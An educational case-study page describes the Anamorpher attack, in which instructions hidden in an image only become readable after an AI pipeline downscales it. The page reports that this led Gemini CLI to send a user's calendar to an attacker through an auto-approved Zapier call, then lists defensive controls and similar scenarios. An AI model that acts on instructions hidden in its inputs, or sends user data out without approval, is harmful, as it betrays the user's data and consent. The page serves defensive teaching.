🔍AI RiskAtlas
← Real-world cases
Case study

Anamorpher — image-scaling prompt injection against production AI systems

Research demonstration21 Aug 2025🗺️ Tool-Using Agent

Trail of Bits showed an image that looks benign at full resolution exposes a hidden prompt-injection payload once an AI pipeline downscales it, and used it against Gemini CLI to silently exfiltrate Google Calendar data through an auto-approved Zapier tool call.

Root cause — why it happened

Many AI systems shrink the pictures you upload before the model looks at them, to save memory. An attacker made a picture that looks like a harmless image at its full size, but when the system shrinks it, faint patterns line up into readable words — instructions for the AI. The person uploading it never sees those words. The AI reads the shrunken picture, treats the hidden words as a command, and acts on them. In the demo the command told a connected email tool to send the user's calendar to a stranger — and because that tool was set to act without asking, it just did it.

Risks this case illustrates

Named in the standard (OWASP/ATLAS/NIST) lens. Click a highlighted component in the diagram below to see which risks attach where.

How it unfolded

UntrustedAgent coreOversightThe real worldgoalshared with victim🧑User🎛️Orchestrator /Agent Loop🧠LLM🔐Identity &Permissions🔧Tool RuntimeHuman ApprovalGate🔌External APIs🗄️BusinessDatabase🌐UntrustedContent📝Audit Logging🌐Attacker-craftedimage (looks🌐Attacker'sinbox / server
InstructionsDataActionsControl / decisionFeedback / logs
👆 Click a component to inspect its risks
SetupStep 1 / 6

The victim uploads a normal-looking image

The user uploads a picture to their AI assistant — say, asking it to describe or work with the image. At full size it looks completely ordinary; there's nothing visibly wrong with it. The attacker prepared this picture earlier and got it to the victim.

📄What the user uploadsdocument
[image: 2048x2048 PNG — appears as an innocuous chart/photo]
User: "Here's the schedule image — can you check my calendar and summarise it?"

# At full resolution the image carries NO visible text.
# The payload is encoded in high-frequency structure that only
# resolves after the pipeline downscales the image.
Step 1 / 6

Controls & guardrails — what would have stopped it

The simplest fix that breaks this: don't let the assistant send data anywhere — email, web, anyone — without a person clicking 'yes' first, and show that person what's actually being sent. The image trick still works, but a tricked AI then has no way to quietly ship your data out. Two extra helps: don't silently shrink images, and show the AI a preview of the exact image it's about to read.

Preventive
  • Human-in-the-loop approval on high-risk actions

    Approval fatigue turns gates into rubber stamps; gates placed after the point of no return do nothing; and approvers can be misled by a model-written summary of the action.

  • Egress allowlisting & DLP on tool arguments

    Allowlists fight an open-ended channel; legitimate-but-broad destinations (any URL fetch, any email) are hard to constrain without breaking usefulness. Encoding can evade naive DLP.

  • Least-privilege identity & scoped credentials

    Doesn't prevent manipulation — only caps its reach. Hard to get right operationally; over-broad scopes are the common real-world failure.

  • MCP/plugin pinning, manifest hashing & re-review

    Review catches what reviewers understand; a subtle malicious directive can pass. Pinning helps only if you actually re-review on update rather than auto-accepting.

Detective
Corrective
  • Loop/cost circuit-breakers & consistency checks

    Thresholds are blunt — too tight breaks legitimate long tasks, too loose lets damage accrue first. Catches runaway dynamics, not a single well-formed bad decision.

  • Governance: risk assessment, red-teaming & incident response

    Process reduces likelihood and speeds recovery but executes no technical control itself; weak follow-through makes it theatre.

Lessons

  • Prompt injection is multimodal: a payload can ride in pixels that only become legible after the pipeline downscales the image — with no text-channel or Unicode analogue for filters to catch.
  • Silent, lossy preprocessing creates an inspected-vs-delivered gap: the operator reviews the full-resolution upload while the model sees a different, downscaled image. Show the model the image it actually gets.
  • Auto-approving tool calls (trust=True) removes the only enforcement between a manipulated model and a real-world action — the durable control is a human gate on sensitive/irreversible calls, not a better input filter.
  • Detecting the crafted image is hard by design; defend at the action and egress boundaries (confirmation + allowlisting + least privilege) so a successful injection still has no path to exfiltrate.

Proposals & gaps this case surfaced

Non-destructive suggestions for the library — proposed, not adopted.

✚ proposed guardrailMultimodal input-fidelity check: show/verify the model-delivered (post-downscale) image and avoid silent lossy resamplingInput Sanitisation & Validation

Before inference, render a preview of the exact image (and dimensions) the model will receive after preprocessing, and either avoid silent downscaling or constrain ingest dimensions — so an attacker cannot hide a payload that only becomes legible after resampling. Closes the inspected-vs-delivered gap that text-based injection filters miss.

This case shows a gap: we usually picture 'hidden instructions' as invisible text, but here they're hidden in an image and only appear after the system shrinks it. There's no guardrail that says 'check that the picture the AI actually sees matches the one the person uploaded' — that divergence is its own risk worth naming.

These surface as proposals across the Control Library and Risk Taxonomy; adopt them by hand when ready.

Practise the risk class — related scenarios

🔑The Agent With the Master Key

An ops agent gets one god-mode credential — and one misread wipes production

📧The Email That Gave Orders

A support email hides instructions — and the assistant obeys them

🗄️When the Query Bites Back

A text-to-SQL agent runs the model's output straight at the database

🕵️Lies in the Loop

A poisoned issue makes the agent lie to the human who approves its actions

👂Overheard Through the Cache

A speed optimisation becomes a cross-tenant listening device

🪟Stealing the Model

Two doors to the same secret: reconstruct the model through its API, or just walk off with the weight file

🪤The Bug Report That Ran Code

A fake Sentry error report hijacks a developer's coding agent into running a shell command

📼The Compromised Flight Recorder

The forensic record is itself the attack surface — an agent's log is poisoned, then quietly rewritten

👁️The Invisible Webpage Command

A shopping page tells the agent to do something the user never asked for

🧠The Memory That Wouldn't Die

A single poisoned document plants a standing instruction that survives every reset

🖼️The Picture That Whispered

A screenshot that's harmless at full size becomes an order once the system shrinks it

🎫The Stolen Session

An attacker captures the agent's bearer token — and inherits its authority

🥸The Uninvited Agent

A forged peer registers on the agent directory — and the planner enlists it

🛡️The Watcher Watched

The eval gate that was supposed to catch the agent is itself the thing being attacked

🪪The Worker Who Spoke for the Boss

A poisoned web page hijacks a research agent — and the planner acts on its behalf

🖼️Zero-Click Leak by Picture

An inbox summary quietly ships a secret to an attacker's server

AI RiskAtlas is an educational model of how GenAI & agentic systems work and fail. Architectures and payloads are illustrative and simplified for learning — not operational guidance. Real-world cases are summarised from public reporting.

Sources & further reading →·Built by Shi Yuan ↗